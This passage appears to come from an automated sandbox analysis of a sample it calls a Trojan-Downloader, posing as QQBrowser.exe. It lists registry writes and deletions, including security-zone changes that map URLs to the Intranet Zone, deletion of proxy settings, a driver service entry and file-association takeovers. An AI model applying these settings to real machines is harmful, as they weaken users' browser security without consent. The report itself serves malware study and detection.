"(Default)" = "QQBrowser.File"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\htm]
"Content Type" = "text/html"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\xhtml\UserChoice]
"Progid" = "QQBrowser.File"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\shell]
"(Default)" = "open"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\https]
"Progid" = "QQBrowser.Protocol"

[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"ImagePath" = "\??\%System%\drivers\TsQBDrv.sys"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\http]
"Hash" = "2Wt0kbHDnFk="

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mhtml\UserChoice]
"Hash" = "RVdenEVwbas="

[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"QBPath" = "\DosDevices\%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\https]
"Hash" = "xsLOy1tlz4o="

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\htm]
"PerceivedType" = "text"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mht\UserChoice]
"Hash" = "dctCQK95cmM="

The process QQBrowser.exe:2888 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 2C 14 88 B7 AD 06 A7 3B 5F 13 9D 55 51 2D C9"

The process QQBrowser.exe:3576 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E 8D 22 B3 F3 E5 53 EF 78 98 EB FE 2D 33 99 B7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"

The process QQBrowser.exe:1960 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 52 34 64 7C 28 BC 48 F4 76 9B F1 09 15 6E F0"

The process QQBrowser.exe:1252 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WLanDiagCtlGuid]
"BitNames" = " WLANHC_AUTOCONFIG WLANHC_RNWFMSM WLANHC_FATMSM WLANHC_DLLMAIN WLANHC_TEST"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"BitNames" = " DOT11_AUTOCONF DOT11_AUTOCONF_CLIENT DOT11_AUTOCONF_UI DOT11_FATMSM DOT11_COMMON DOT11_WLANGPA DOT11_CLASS_COINSTALLER"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
"Guid" = "2e8d9ec5-a712-48c4-8ce0-631eb0c1cd65"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\Chromium\StabilityMetrics]
"user_experience_metrics.stability.exited_cleanly" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"BitNames" = " DOT11_ASSOCIATE DOT11_ROAMING DOT11_1X DOT11_PNP DOT11_SCAN DOT11_RECEIVE DOT11_SEND DOT11_IOCTL DOT11_OID DOT11_MISC DOT11_UPCALL DOT11_KEYMGR DOT11_PEER DOT11_SOFTAP DOT11_PAM DOT11_REPEATER DOT11_APROUTER DOT11_WME DOT11_CONFIG DOT11_MSM DOT11_MSM_ADAPT DOT11_MSM_SCAN DOT11_MSM_CONNECT DOT11_MSM_SECURITY_PKT DOT11_NOTIFY_OBJECT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"Guid" = "0c5a3172-2248-44fd-b9a6-8389cb1dc56a"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
"BitNames" = " SECHC_LOG_FLAG_ASSERT SECHC_LOG_FLAG_INIT SECHC_LOG_FLAG_DIAG SECHC_LOG_FLAG_ONEX_DIAG SECHC_LOG_FLAG_REPAIR SECHC_LOG_FLAG_STATE SECHC_LOG_FLAG_EXT SECHC_LOG_FLAG_EVENT_LOG SECHC_LOG_FLAG_FUNCTION SECHC_LOG_FLAG_MEMORY SECHC_LOG_FLAG_LOCKS"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Tencent\QQBrowser\FavSync]
"clientguid" = "b0a3ce30538e195b075c1c7e144988cb"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCU\Software\Chromium]
"_NumSignedIn" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 B4 B4 C3 B2 24 F9 6F 85 5C D8 EA 2D 68 82 5C"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\QQBrowser\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Chromium]
"_NumAccounts" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"Guid" = "d905ac1c-65e7-4242-99ea-fe66a8355df8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"BitNames" = " WD_LOG_FLAG_INIT WD_LOG_FLAG_RPC WD_LOG_FLAG_EVENT WD_LOG_FLAG_INTERFACE WD_LOG_FLAG_CONNECTION WD_LOG_FLAG_CONTROL WD_LOG_FLAG_LOCKS WD_LOG_FLAG_MEMORY WD_LOG_FLAG_REFERENCES WD_LOG_FLAG_FUNCTION_TRACE WD_LOG_FLAG_ASSERT"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Chromium]
"usagestats" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WLanDiagCtlGuid]
"Guid" = "6da4ddca-0901-4bae-9ad4-7e6030bab531"

[HKCU\Software\Tencent\QQBrowser\OnlineSetup]
"sso-f1" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"Guid" = "637a0f36-dff5-4b2f-83dd-b106c1c725e2"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\QQBrowser\DEBUG]
"Trace Level"

The process QQBrowser.exe:2364 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 43 09 D2 35 1E E2 93 CB 97 94 C6 C6 F5 82 5D"

The process QQBrowser.exe:3600 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 08 9B 01 4E 2E 83 1B 0D 16 52 3F 20 66 22 B3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"

The process QQBrowser.exe:2624 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Tencent\QQBrowser\Advanced]
"DirectWriteFontRenderEnabled" = "0"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 01 00 00 00 00 00 00 00 00 00 00 00"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"JoinUserExperienceImprovePlan" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\Temp]
"QQBrowserLiveup.exe" = "QQBrowserLiveup"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"NeedImportOtherBrowserExtension" = "1"

"HelloQB" = "9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Tencent\QQBrowser\Common]
"UninstalledExtensions" = "7B 7D"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"FirstLaunch" = "0"

[HKCU\Software\Tencent\QQBrowser\Common]
"SearchEngineKeyword" = "sogou.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Tencent\QQBrowser\Record]
"FProcId" = "2624"

[HKCU\Software\Tencent\QQBrowser\Layout]
"PluginBarInfo" = "7B 22 70 6C 75 67 69 6E 5F 69 6E 66 6F 5F 76 65"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Tencent\QQBrowser\Liveup]
"CheckResult" = "160"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Tencent\QQBrowser\Liveup]
"LastQueryDate" = "13108115704780"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"NeedImportDefBrowserBookmark" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"NeedImportConfigBookmark" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Tencent\QQBrowser\Common]
"SearchEngine" = ""

[HKCU\Software\Tencent\QQBrowser\Advanced]
"AeroEffectSupported" = "0"

[HKCU\Software\Tencent\QQBrowser\Record]
"BProcId" = "1252"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 D1 7C DE 1A 5F 20 BF 45 BD 32 93 99 F6 C9 96"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"AeroEffectEnabled" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"NewInstall" = "0"
"FirstLaunchTime" = "223213787"

[HKCU\Software\Tencent\QQBrowser\Launch]
"AutoRestoreTabs" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Tencent\QQBrowser\Common]
"MainPageDIY9"

[HKCU\Software\Tencent\QQBrowser\Record]
"FProcId"
"IsExiting"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"QB9Overwrite8"

[HKCU\Software\Tencent\QQBrowser\Launch]
"EducationUrl"

[HKCU\Software\Tencent\QQBrowser\Record]
"BProcId"

The process QQBrowser.exe:2852 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 35 1C D3 7D 33 EA F5 89 7C 8D 34 2E 42 34 6C"

The process QQBrowser.exe:2764 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 37 AD AF B8 8A AD F7 02 79 89 F2 36 32 C1 3F"

The process QQBrowser.exe:3404 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 C7 9F 42 81 25 7B 67 0E 60 C0 A0 2C 5A 63 78"

The process QQBrowser.exe:2836 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 61 0F 9F A6 FE BC 0A D4 72 1F AF 44 24 ED D5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process QQBrowser.exe:2488 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD A7 6C 4F F6 B2 5A 7C 37 C0 42 73 E4 CF DB 4C"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"

The process QQBrowser.exe:4064 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 01 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"Desc" = "QBSafe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"AutoUpdated" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"Operational" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"ManifestVersion" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"STYLE" = "80"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"Name" = "QBSafe"

[HKCU\Software\Tencent\QQBrowser\Record]
"IsColdStartup" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"RequiredMinVersion" = "9.0.1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200\BackgroundDll]
"Path" = "QBSafe.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 96 10 8F CB 7D 47 A5 C3 0F 7F D4 88 E2 BB E7"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"Version" = "9.0.0.200"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}]
"UpdateVersion" = "9.0.0.200"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
